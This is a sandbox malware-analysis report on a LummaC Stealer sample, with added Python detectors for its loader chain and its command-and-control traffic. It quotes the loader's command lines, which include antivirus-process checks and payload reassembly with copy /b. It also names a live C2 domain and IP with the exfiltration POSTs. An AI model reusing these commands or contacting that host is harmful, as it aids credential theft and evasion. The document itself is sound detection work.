
Windows Analysis Report
BagsThroat.exe

Overview

General Information

Sample name: BagsThroat.exe
Analysis ID: 1581567
MD5: 3b819d687b2bde89ade8eb1aeb4c6c5f
SHA1: e77057a1143c44eaf281e5f1a65ddc19c0a7cb98
SHA256: 0158aa426fceb64ed638b0abddbb6e26dc0806938ad34246db7ff0088668a7ee
Tags: exe, lummastealer, user-zhuzhu0009

Detection

LummaC Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Process Tree

  • System is w10x64
  • BagsThroat.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\BagsThroat.exe" MD5: 3B819D687B2BDE89ADE8EB1AEB4C6C5F)
    • cmd.exe (PID: 6048 cmdline: "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6224 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1868 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1124 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2128 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4180 cmdline: cmd /c md 441412 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 3816 cmdline: extrac32 /Y /E Discovered MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7120 cmdline: findstr /V "Detailed" Eat MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5324 cmdline: cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6768 cmdline: cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Noted.com (PID: 1276 cmdline: Noted.com S MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 4564 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
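The process tree above is the whole loader stage in one cmd.exe session: an extensionless blob is renamed to `Subjects.cmd` and executed, `tasklist | findstr` is used twice to look for AV/EDR processes, `extrac32` unpacks a CAB, the split payload is reassembled with `copy /b`, and the result (an AutoIt-compiled `Noted.com`) is run from the INetCache directory. The following detection logic is an added example written for this page, not Joe Security's Sigma rule or any vendor's code. The events are transcribed from the report's process tree; the `pid/ppid/image/cmdline` field names are an assumption and correspond to Sysmon EID 1 or Security 4688 fields in a real pipeline.

```python
"""Detect the batch-loader chain seen in this report from process-creation events."""
import re
from dataclasses import dataclass

# Names the dropped batch file greps for in tasklist output (both findstr calls above).
AV_PROCESS_NAMES = {"opssvc", "wrsa", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "ekrn", "sophoshealth"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rename_and_run_cmd(ev: ProcEvent) -> bool:
    """cmd /c move <name> <name>.cmd & <name>.cmd: give an extensionless file a
    script extension and run it in the same command line."""
    return image_name(ev.image) == "cmd.exe" and bool(
        re.search(r"\bmove\s+(\S+)\s+\1\.cmd\s*&\s*\1\.cmd", ev.cmdline, re.I))


def av_discovery(ev: ProcEvent) -> bool:
    """findstr fed a list of AV/EDR process names (the tasklist | findstr idiom)."""
    if image_name(ev.image) != "findstr.exe":
        return False
    tokens = {t.strip('"').lower() for t in ev.cmdline.split()}
    return bool(tokens & AV_PROCESS_NAMES)


def binary_concat(ev: ProcEvent) -> bool:
    """copy /b a + b + c ... target: reassembling a payload split across files."""
    m = re.search(r"\bcopy\s+/b\s+(.+)", ev.cmdline, re.I)
    return bool(m) and m.group(1).count("+") >= 2


def renamed_payload_from_cache(ev: ProcEvent) -> bool:
    """A .com/.pif/.scr image launched from a browser cache or temp directory."""
    low = ev.image.lower()
    return low.endswith((".com", ".pif", ".scr")) and any(
        d in low for d in ("\\inetcache\\", "\\temp\\", "\\appdata\\local\\"))


RULES = {
    "rename_and_run_cmd": rename_and_run_cmd,
    "av_discovery": av_discovery,
    "binary_concat": binary_concat,
    "renamed_payload_from_cache": renamed_payload_from_cache,
}


def detect(events):
    """Return {rule_name: [pid, ...]} for every rule, in event order."""
    hits = {name: [] for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(ev.pid)
    return hits


def chain_score(events):
    """Distinct rules fired by the children of one parent, plus one if that parent
    is itself the move-and-run cmd.exe. A lone admin 'copy /b' scores 1; this
    report's chain scores 4."""
    by_pid = {ev.pid: ev for ev in events}
    fired = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                fired.setdefault(ev.ppid, set()).add(name)
    best = 0
    for ppid, names in fired.items():
        parent = by_pid.get(ppid)
        bonus = 1 if parent is not None and rename_and_run_cmd(parent) else 0
        best = max(best, len(names) + bonus)
    return best


# Transcribed from the report's process tree (PIDs and command lines as listed there).
EVENTS = [
    ProcEvent(6388, 0, r"C:\Users\user\Desktop\BagsThroat.exe", r'"C:\Users\user\Desktop\BagsThroat.exe"'),
    ProcEvent(6048, 6388, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd'),
    ProcEvent(6224, 6048, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(1868, 6048, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /I "opssvc wrsa"'),
    ProcEvent(2128, 6048, r"C:\Windows\SysWOW64\findstr.exe",
              'findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'),
    ProcEvent(4180, 6048, r"C:\Windows\SysWOW64\cmd.exe", "cmd /c md 441412"),
    ProcEvent(3816, 6048, r"C:\Windows\SysWOW64\extrac32.exe", "extrac32 /Y /E Discovered"),
    ProcEvent(7120, 6048, r"C:\Windows\SysWOW64\findstr.exe", 'findstr /V "Detailed" Eat'),
    ProcEvent(5324, 6048, r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com"),
    ProcEvent(6768, 6048, r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S"),
    ProcEvent(1276, 6048, r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com", "Noted.com S"),
    ProcEvent(4564, 6048, r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5"),
]

if __name__ == "__main__":
    print(detect(EVENTS))
    print("chain score:", chain_score(EVENTS))
```

Each rule on its own is noisy (`copy /b` and `tasklist | findstr` are legitimate admin idioms); the value is in `chain_score`, which only reaches 3 or more when several of them hang off the same cmd.exe parent, which is what this sample does. The AV name list is only what this particular batch file checks for; a production rule would match on the `tasklist`-piped-to-`findstr` shape rather than on a fixed name set.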
No configs have been found
Source             Rule                          Description                   Author
sslproxydump.pcap  JoeSecurity_LummaCStealer_3   Yara detected LummaC Stealer  Joe Security
sslproxydump.pcap  JoeSecurity_LummaCStealer_2   Yara detected LummaC Stealer  Joe Security

HIPS / PFW / Operating System Protection Evasion

Source: Process started
Author: Joe Security
Data:
  Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
  CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
  CommandLine|base64offset|contains: ~)
  Image: C:\Windows\SysWOW64\findstr.exe
  NewProcessName: C:\Windows\SysWOW64\findstr.exe
  OriginalFileName: C:\Windows\SysWOW64\findstr.exe
  ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd
  ParentImage: C:\Windows\SysWOW64\cmd.exe
  ParentProcessId: 6048
  ParentProcessName: cmd.exe
  ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
  ProcessId: 2128
  ProcessName: findstr.exe
Timestamp                        SID      Severity  Classtype                                      Source              Destination      Protocol
2024-12-28T09:13:23.312130+0100  2028371  3         Unknown Traffic                                192.168.2.5:49727   104.21.80.1:443  TCP
2024-12-28T09:13:25.381207+0100  2028371  3         Unknown Traffic                                192.168.2.5:49733   104.21.80.1:443  TCP
2024-12-28T09:13:27.757910+0100  2028371  3         Unknown Traffic                                192.168.2.5:49738   104.21.80.1:443  TCP
2024-12-28T09:13:29.923164+0100  2028371  3         Unknown Traffic                                192.168.2.5:49744   104.21.80.1:443  TCP
2024-12-28T09:13:32.201365+0100  2028371  3         Unknown Traffic                                192.168.2.5:49750   104.21.80.1:443  TCP
2024-12-28T09:13:34.733711+0100  2028371  3         Unknown Traffic                                192.168.2.5:49756   104.21.80.1:443  TCP
2024-12-28T09:13:36.787090+0100  2028371  3         Unknown Traffic                                192.168.2.5:49762   104.21.80.1:443  TCP
2024-12-28T09:13:39.138807+0100  2028371  3         Unknown Traffic                                192.168.2.5:49768   104.21.80.1:443  TCP
2024-12-28T09:13:41.715508+0100  2028371  3         Unknown Traffic                                192.168.2.5:49779   104.21.80.1:443  TCP
2024-12-28T09:13:24.069083+0100  2054653  1         A Network Trojan was detected                  192.168.2.5:49727   104.21.80.1:443  TCP
2024-12-28T09:13:26.175399+0100  2054653  1         A Network Trojan was detected                  192.168.2.5:49733   104.21.80.1:443  TCP
2024-12-28T09:13:24.069083+0100  2049836  1         A Network Trojan was detected                  192.168.2.5:49727   104.21.80.1:443  TCP
2024-12-28T09:13:26.175399+0100  2049812  1         A Network Trojan was detected                  192.168.2.5:49733   104.21.80.1:443  TCP
2024-12-28T09:13:37.598789+0100  2048094  1         Malware Command and Control Activity Detected  192.168.2.5:49762   104.21.80.1:443  TCP
2024-12-28T09:13:39.142379+0100  2843864  1         A Network Trojan was detected                  192.168.2.5:49768   104.21.80.1:443  TCP


      AV Detection

Source: BagsThroat.exeVirustotal: Detection: 23%
      Source: BagsThroat.exeReversingLabs: Detection: 18%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 97.3% probability
      Source: BagsThroat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49768 version: TLS 1.2
      Source: BagsThroat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\BagsThroat.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\

      Networking

      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49727 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49727 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49762 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49768 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49733 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49733 -> 104.21.80.1:443
      Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49738 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49727 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49762 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49768 -> 104.21.80.1:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49779 -> 104.21.80.1:443
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 76 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VIIPI8FN01MEB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12802 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GK175PZ75M1UY3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15050 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WX4W87C9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20504 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WFZFUTULE9E3NLKXYA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 5473 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=A5ITWVH5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1201 | Host: crackerdolk.click
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=OZ3O7DI1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 574908 | Host: crackerdolk.click
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: yHUkiJhYyguIo.yHUkiJhYyguIo
      Source: global trafficDNS traffic detected: DNS query: crackerdolk.click
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: BagsThroat.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: BagsThroat.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: BagsThroat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0I
      Source: BagsThroat.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Noted.com, 0000000D.00000000.2054497861.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Noted.com.2.dr, Heights.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: BagsThroat.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: BagsThroat.exeString found in binary or memory: http://www.teamviewer.com
      Source: Noted.com.2.dr, Tim.9.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Tim.9.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
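The HTTP detections above show the C2 shape behind the Suricata hits: two tiny `application/x-www-form-urlencoded` POSTs to `/api` (8 and 76 bytes, the check-in), then six `multipart/form-data` POSTs to the same path whose sizes grow to 574 kB (the exfiltrated archives). The User-Agent claims Chrome 119, but none of the multipart boundaries (`VIIPI8FN01MEB`, `WX4W87C9`, ...) have the `----WebKitFormBoundary<16 chars>` form that Chrome itself generates. The detector below is an added example for this page, not Joe Security's or Emerging Threats' logic. The request headers are transcribed from the report and joined with CRLF here; the `example.com` control request is constructed and does not appear in the report; the size threshold for a check-in (128 bytes) and the minimum upload count (2) are assumed tuning values.

```python
"""Flag the small-POST check-in followed by multipart uploads to one path, plus a
browser User-Agent whose multipart boundary a browser would never produce."""
import re
from collections import defaultdict

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

# Chrome/Chromium form boundaries look like ----WebKitFormBoundary + 16 alphanumerics.
CHROME_BOUNDARY = re.compile(r"^----WebKitFormBoundary[A-Za-z0-9]{16}$")


def _req(ctype, length, host="crackerdolk.click", path="/api", method="POST"):
    """Build one raw request head; header set matches the report's detections."""
    return (f"{method} {path} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: {ctype}\r\nUser-Agent: {UA}\r\n"
            f"Content-Length: {length}\r\nHost: {host}\r\n\r\n")


# Transcribed from the report's "HTTP traffic detected" lines, in order.
SAMPLE_REQUESTS = [
    _req("application/x-www-form-urlencoded", 8),
    _req("application/x-www-form-urlencoded", 76),
    _req("multipart/form-data; boundary=VIIPI8FN01MEB", 12802),
    _req("multipart/form-data; boundary=GK175PZ75M1UY3", 15050),
    _req("multipart/form-data; boundary=WX4W87C9", 20504),
    _req("multipart/form-data; boundary=WFZFUTULE9E3NLKXYA", 5473),
    _req("multipart/form-data; boundary=A5ITWVH5", 1201),
    _req("multipart/form-data; boundary=OZ3O7DI1", 574908),
    # Constructed control (not in the report): a genuine browser-shaped upload elsewhere.
    _req("multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW1", 2048,
         host="example.com", path="/upload"),
]


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request-head parser: method, path, lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def ua_boundary_mismatch(req: dict) -> bool:
    """True when the UA says Chrome but the multipart boundary is not Chrome-shaped."""
    ctype = req["headers"].get("content-type", "")
    m = re.search(r"boundary=([^;]+)", ctype)
    if not m or "Chrome/" not in req["headers"].get("user-agent", ""):
        return False
    return CHROME_BOUNDARY.match(m.group(1).strip().strip('"')) is None


def checkin_then_exfil(requests, max_checkin=128, min_uploads=2):
    """Group POSTs by (host, path); return groups that have at least one tiny
    form-encoded check-in and min_uploads multipart uploads."""
    stats = defaultdict(lambda: {"checkins": 0, "uploads": 0, "bytes": 0, "bad_boundary": 0})
    for req in requests:
        if req["method"] != "POST":
            continue
        h = req["headers"]
        key = (h.get("host", ""), req["path"])
        length = int(h.get("content-length", "0"))
        ctype = h.get("content-type", "")
        if ctype.startswith("application/x-www-form-urlencoded") and length <= max_checkin:
            stats[key]["checkins"] += 1
        elif ctype.startswith("multipart/form-data"):
            stats[key]["uploads"] += 1
            stats[key]["bytes"] += length
            stats[key]["bad_boundary"] += int(ua_boundary_mismatch(req))
    return {k: s for k, s in stats.items()
            if s["checkins"] and s["uploads"] >= min_uploads}


def analyze(raw_requests):
    return checkin_then_exfil([parse_request(r) for r in raw_requests])


if __name__ == "__main__":
    for (host, path), s in analyze(SAMPLE_REQUESTS).items():
        print(f"{host}{path}: {s['checkins']} check-ins, {s['uploads']} uploads, "
              f"{s['bytes']} bytes, {s['bad_boundary']} non-browser boundaries")
```

On this sample the `crackerdolk.click` `/api` group is flagged with 2 check-ins, 6 uploads, 629938 bytes uploaded and 6 boundary mismatches, while the control upload to `example.com` is not. The boundary check is cheap and survives a C2 domain change; the check-in-then-upload shape is what the ET "CnC Host Checkin" and "Exfiltration" signatures above are keyed on, here reduced to header fields only, so it also works on the decrypted request heads from a TLS-inspecting proxy without access to the bodies.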
